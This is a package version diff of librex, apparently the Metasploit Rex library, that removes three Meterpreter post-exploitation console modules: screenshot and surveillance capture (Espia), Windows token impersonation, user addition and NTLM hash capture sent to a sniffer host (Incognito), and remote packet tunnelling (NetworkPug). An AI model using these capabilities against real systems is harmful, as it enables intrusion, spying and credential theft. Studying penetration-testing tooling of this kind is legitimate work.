librex 0.0.13 → 0.0.15

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb

@@ -1,108 +0,0 @@
-require 'rex/post/meterpreter'
-
-module Rex
-module Post
-module Meterpreter
-module Ui
-
-###
-#
-# Espia - Capture audio, video, screenshots from the remote system
-#
-###
-class Console::CommandDispatcher::Espia
-
-	Klass = Console::CommandDispatcher::Espia
-
-	include Console::CommandDispatcher
-
-	#
-	# Initializes an instance of the espia command interaction.
-	#
-	def initialize(shell)
-		super
-	end
-
-	#
-	# List of supported commands.
-	#
-	def commands
-		{
-	#		"dev_image"  => "Attempt to grab a frame from webcam",
-	#		"dev_audio"  => "Attempt to record microphone audio",
-			"screengrab" => "Attempt to grab screen shot from process's active desktop"
-		}
-	end
-
-	def cmd_dev_image()
-		client.espia.espia_video_get_dev_image()
-		print_line("[*] Done.")
-
-		return true
-	end
-
-	def cmd_dev_audio(*args)
-		maxrec = 60
-
-		if (args.length < 1)
-			print_line("Usage: dev_audio <rec_secs>\n")
-			print_line("Record mic audio\n")
-			return true
-		end
-
-		secs = args[0].to_i
-		if secs  > 0 and secs <= maxrec
-			milsecs = secs*1000
-			print_line("[*] Recording #{milsecs} miliseconds.\n")
-			client.espia.espia_audio_get_dev_audio(milsecs)
-			print_line("[*] Done.")
-		else
-			print_line("[-] Error: Recording time 0 to 60 secs \n")
-		end
-
-		return true
-	end
-
-	#
-	# Grab a screenshot of the current interactive desktop.
-	#
-	def cmd_screengrab( *args )
-		if( args[0] and args[0] == "-h" )
-			print_line("Usage: screengrab <path.jpeg> [view in browser: true|false]\n")
-			print_line("Grab a screenshot of the current interactive desktop.\n")
-			return true
-		end
-		
-		show = true
-		show = false if (args[1] and args[1] =~ /^(f|n|0)/i)
-		
-		path = args[0] || Rex::Text.rand_text_alpha(8) + ".jpeg"
-		
-		data = client.espia.espia_image_get_dev_screen
-		
-		if( data )
-			::File.open( path, 'wb' ) do |fd|
-				fd.write( data )
-			end
-			path = ::File.expand_path( path )
-			print_line( "Screenshot saved to: #{path}" )
-			Rex::Compat.open_file( path ) if show
-		end
-		
-		return true
-	end
-
-	#
-	# Name for this dispatcher
-	#
-	def name
-		"Espia"
-	end
-
-end
-
-end
-end
-end
-end
-

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb

@@ -1,241 +0,0 @@
-require 'rex/post/meterpreter'
-
-module Rex
-module Post
-module Meterpreter
-module Ui
-
-###
-#
-# Privilege escalation extension user interface.
-#
-###
-class Console::CommandDispatcher::Incognito
-
-	Klass = Console::CommandDispatcher::Incognito
-
-	include Console::CommandDispatcher
-
-	#
-	# Initializes an instance of the priv command interaction.
-	#
-	def initialize(shell)
-		super
-	end
-
-	#
-	# List of supported commands.
-	#
-	def commands
-		{
-			"add_user" => "Attempt to add a user with all tokens",
-			"add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
-			"add_group_user" => "Attempt to add a user to a global group with all tokens",
-			"list_tokens" => "List tokens available under current user context",
-			"impersonate_token" => "Impersonate specified token",
-			"snarf_hashes" => "Snarf challenge/response hashes for every token"
-		}
-	end
-
-
-	@@add_user_opts = Rex::Parser::Arguments.new(
-		"-h" => [ true,  "Add user to remote host" ])
-
-	@@add_localgroup_user_opts = Rex::Parser::Arguments.new(
-		"-h" => [ true,  "Add user to local group on remote host" ])
-
-	@@add_group_user_opts = Rex::Parser::Arguments.new(
-		"-h" => [ true,  "Add user to global group on remote host" ])
-
-	@@list_tokens_opts = Rex::Parser::Arguments.new(
-		"-u" => [ false,  "List tokens by unique username" ],
-		"-g" => [ false, "List tokens by unique groupname" ])
-
-	def cmd_list_tokens(*args)
-		token_order = -1
-
-		@@list_tokens_opts.parse(args) { |opt, idx, val|
-			case opt
-				when "-u"
-					token_order = 0
-				when "-g"
-					token_order = 1
-			end
-		}
-
-		if (token_order == -1)
-			print_line("Usage: list_tokens <list_order_option>\n")
-			print_line("Lists all accessible tokens and their privilege level")
-			print_line(@@list_tokens_opts.usage)
-			return
-		end
-
-		system_privilege_check
-
-		tokens = client.incognito.incognito_list_tokens(token_order)
-
-		print_line()
-		print_line("Delegation Tokens Available")
-		print_line("========================================")
-
-		tokens['delegation'].each_line { |string|
-			print(string)
-		}
-
-		print_line()
-		print_line("Impersonation Tokens Available")
-		print_line("========================================")
-
-		tokens['impersonation'].each_line { |string|
-			print(string)
-		}
-
-		print_line()
-
-		return true
-	end
-
-	def cmd_impersonate_token(*args)
-		if (args.length < 1)
-			print_line("Usage: impersonate_token <token>\n")
-			print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
-			print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
-			print_line("Hint: Enclose with quotation marks if name contains a space\n")
-			return
-		end
-
-		system_privilege_check
-		username = args[0]
-		client.incognito.incognito_impersonate_token(username).each_line { |string|
-			print(string)
-		}
-
-		return true
-	end
-
-	def cmd_add_user(*args)
-		# Default to localhost
-		host = "127.0.0.1"
-
-		@@add_user_opts.parse(args) { |opt, idx, val|
-			case opt
-				when "-h"
-					host = val
-			end
-		}
-				
-		if (args.length < 2)
-			print_line("Usage: add_user <username> <password> [options]\n")
-			print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
-			print_line(@@add_user_opts.usage)
-			return
-		end
-
-		system_privilege_check
-
-		username = args[0]
-		password = args[1]
-
-		client.incognito.incognito_add_user(host, username, password).each_line { |string|
-			print(string)
-		}
-
-		return true
-	end
-
-	def cmd_add_localgroup_user(*args)
-		# Default to localhost
-		host = "127.0.0.1"
-
-		@@add_localgroup_user_opts.parse(args) { |opt, idx, val|
-			case opt
-				when "-h"
-					host = val
-			end
-		}
-				
-		if (args.length < 2)
-			print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
-			print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
-			print_line(@@add_localgroup_user_opts.usage)
-			return
-		end
-
-		system_privilege_check
-
-		groupname = args[0]
-		username = args[1]
-
-		client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
-			print(string)
-		}
-
-		return true
-	end
-
-	def cmd_add_group_user(*args)
-		# Default to localhost
-		host = "127.0.0.1"
-
-		@@add_group_user_opts.parse(args) { |opt, idx, val|
-			case opt
-				when "-h"
-					host = val
-			end
-		}
-				
-		if (args.length < 2)
-			print_line("Usage: add_group_user <groupname> <username> [options]\n")
-			print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
-			print_line(@@add_group_user_opts.usage)
-			return
-		end
-
-		system_privilege_check
-
-		groupname = args[0]
-		username = args[1]
-
-		client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
-			print(string)
-		}
-
-		return true
-	end
-
-	def cmd_snarf_hashes(*args)
-		if (args.length < 1)
-			print_line("Usage: snarf_hashes <sniffer_host>\n")
-			print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
-			return
-		end
-
-		system_privilege_check
-
-		print_line("[*] Snarfing token hashes...")
-		client.incognito.incognito_snarf_hashes(args[0])
-		print_line("[*] Done. Check sniffer logs")
-		
-		return true
-	end
-
-	def system_privilege_check
-		if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
-			print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
-			print_line("             Call rev2self if primary process token is SYSTEM")
-		end
-	end
-
-	#
-	# Name for this dispatcher
-	#
-	def name
-		"Incognito"
-	end
-
-end
-
-end
-end
-end
-end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb

@@ -1,231 +0,0 @@
-require 'rex/post/meterpreter'
-
-module Rex
-module Post
-module Meterpreter
-module Ui
-
-# Rex::Ui::Text::IrbShell.new(binding).run
-
-class Console::CommandDispatcher::NetworkPug
-
-	Klass = Console::CommandDispatcher::NetworkPug
-
-	include Console::CommandDispatcher
-
-	@@options = Rex::Parser::Arguments.new(
-		"-i" => [ true, "Interface on remote machine to listen on" ],
-		"-f" => [ true, "Additional pcap filtering mechanism" ],
-		"-v" => [ false, "Virtual NIC (packets only for your TAP dev locally)" ]
-	)
-
-	def initialize(shell)
-		@thread_stuff = nil
-		@tapdev = nil
-		@channel = nil
-
-		super
-	end
-
-	attr_accessor :thread_stuff
-	attr_accessor :tapdev
-	attr_accessor :channel
-
-
-	#
-	# List of supported commands.
-	#
-	def commands
-		{
-			"networkpug_start" => "Start slinging packets between hosts",
-			"networkpug_stop"  => "Stop slinging packets between hosts",
-		}
-	end
-
-	def setup_tapdev
-		# XXX, look at how to use windows equivilient and include
-
-		tapdev = ::File.open("/dev/net/tun", "wb+")
-
-		0.upto(16) { |idx|
-			name = "npug#{idx}"
-
-			ifreq = [ name, 0x1000 | 0x02, "" ].pack("a16va14")
-
-			begin
-				tapdev.ioctl(0x400454ca, ifreq)		# is there a better way than hex constant
-			rescue Errno::EBUSY
-				next
-			end
-			
-			ifreq = [ name ].pack("a32")
-
-			tapdev.ioctl(0x8927, ifreq)
-
-			# print_line(Rex::Text.hexify(ifreq))
-
-			mac = sprintf("%02x:%02x:%02x:%02x:%02x:%02x", ifreq[18], ifreq[19], ifreq[20], ifreq[21], ifreq[22], ifreq[23])
-
-			return tapdev, name, mac
-		}
-		
-		tapdev.close()
-		return nil, nil, nil
-	end
-
-	def proxy_packets()
-		while 1
-			# Ghetto :\
-
-			sd = Rex::ThreadSafe.select([ @channel.lsock, @tapdev ], nil, nil)
-
-			sd[0].each { |s|
-				if(s == @channel.lsock)	# Packet from remote host to local TAP dev
-					len = @channel.lsock.read(2)
-					len = len.unpack('n')[0]
-
-					#print_line("Got #{len} bytes from remote host's network")
-					
-					if(len > 1514 or len == 0)
-						@tapdev.close()
-						print_line("length is invalid .. #{len} ?, de-synchronized ? ")
-					end
-
-					packet = @channel.lsock.read(len)
-
-					print_line("packet from remote host:\n" + Rex::Text.hexify(packet))
-
-					@tapdev.syswrite(packet)
-
-				elsif(s == @tapdev)
-					# Packet from tapdev to remote host network
-
-					packet = @tapdev.sysread(1514)
-
-					print_line("packet to remote host:\n" + Rex::Text.hexify(packet))
-
-					@channel.write(packet)
-				end
-			} if(sd)
-
-			if(not sd)
-				print_line("hmmm. ")
-			end
-		end
-	end
-
-	def cmd_networkpug_start(*args)
-		# PKS - I suck at ruby ;\
-
-		virtual_nic = false
-		filter = nil
-		interface = nil
-
-		if(args.length == 0)
-			args.unshift("-h")
-		end
-
-		@@options.parse(args) { |opt, idx, val|
-			# print_line("before: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}")
-			case opt
-				when "-v"
-					virtual_nic = true
-
-				when "-f"
-					filter = val
-
-				when "-i"
-					interface = val
-
-				when "-h"
-					print_error("Usage: networkpug_start -i interface [options]")
-					print_error("")
-					print_error(@@options.usage)
-			end
-			# print_line("after: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}")
-
-		}
-
-		if (interface == nil)
-			print_error("Usage: networkpug_start -i interface [options]")
-			print_error("")
-			print_error(@@options.usage)
-			return
-		end
-
-		@tapdev, tapname, mac = setup_tapdev
-
-		if(@tapdev == nil)
-			print_status("Failed to create tapdev")
-			return
-		end
-
-		# PKS, we should implement multiple filter strings and let the
-		# remote host build it properly.
-		# not (our conn) and (virtual nic filter) and (custom filter)
-		# print_line("before virtual, filter is #{filter}")
-
-		if(filter == nil and virtual_nic == true)
-			filter = "ether host #{mac}"
-		elsif(filter != nil and virtual_nic == true)
-			filter += " and ether host #{mac}"
-			#print_line("Adjusted filter is #{filter}")
-		end
-
-		print_line("#{tapname} created with a hwaddr of #{mac}, ctrl-c when done")
-
-		response, @channel = client.networkpug.networkpug_start(interface, filter)
-
-		if(@channel)
-			@thread_stuff = Rex::ThreadFactory.spawn("MeterpreterNetworkPUGReceiver", false) {
-				proxy_packets()
-			}
-
-			print_line("Packet slinger for #{interface} has a thread structure of #{@thread_stuff}")
-		end
-
-		return true
-	end
-	
-	def cmd_networkpug_stop(*args)
-		interface = args[0]
-		if (interface == nil)
-			print_error("Usage: networkpug_stop [interface]")
-			return
-		end		
-
-		client.networkpug.networkpug_stop(interface)
-
-		#print_line("client.networkpug.networkpug_stop returned")
-
-		if(@thread_stuff)
-			# print_line("killing thread")
-			@thread_stuff.kill
-
-			#print_line("joining thread")
-			#@thread_stuff.join
-			# meterpreter dies if i try to join.. not sure why.
-
-			@thread_stuff = nil
-			
-			#print_line("closing tapdev")
-			@tapdev.close
-
-			#print_line("closing channel")
-			#@channel.close
-		end
-
-		print_status("Packet slinging stopped on #{interface}")
-		return true
-	end
-	
-	def name
-		"NetworkPug"
-	end
-
-end
-
-end
-end
-end
-end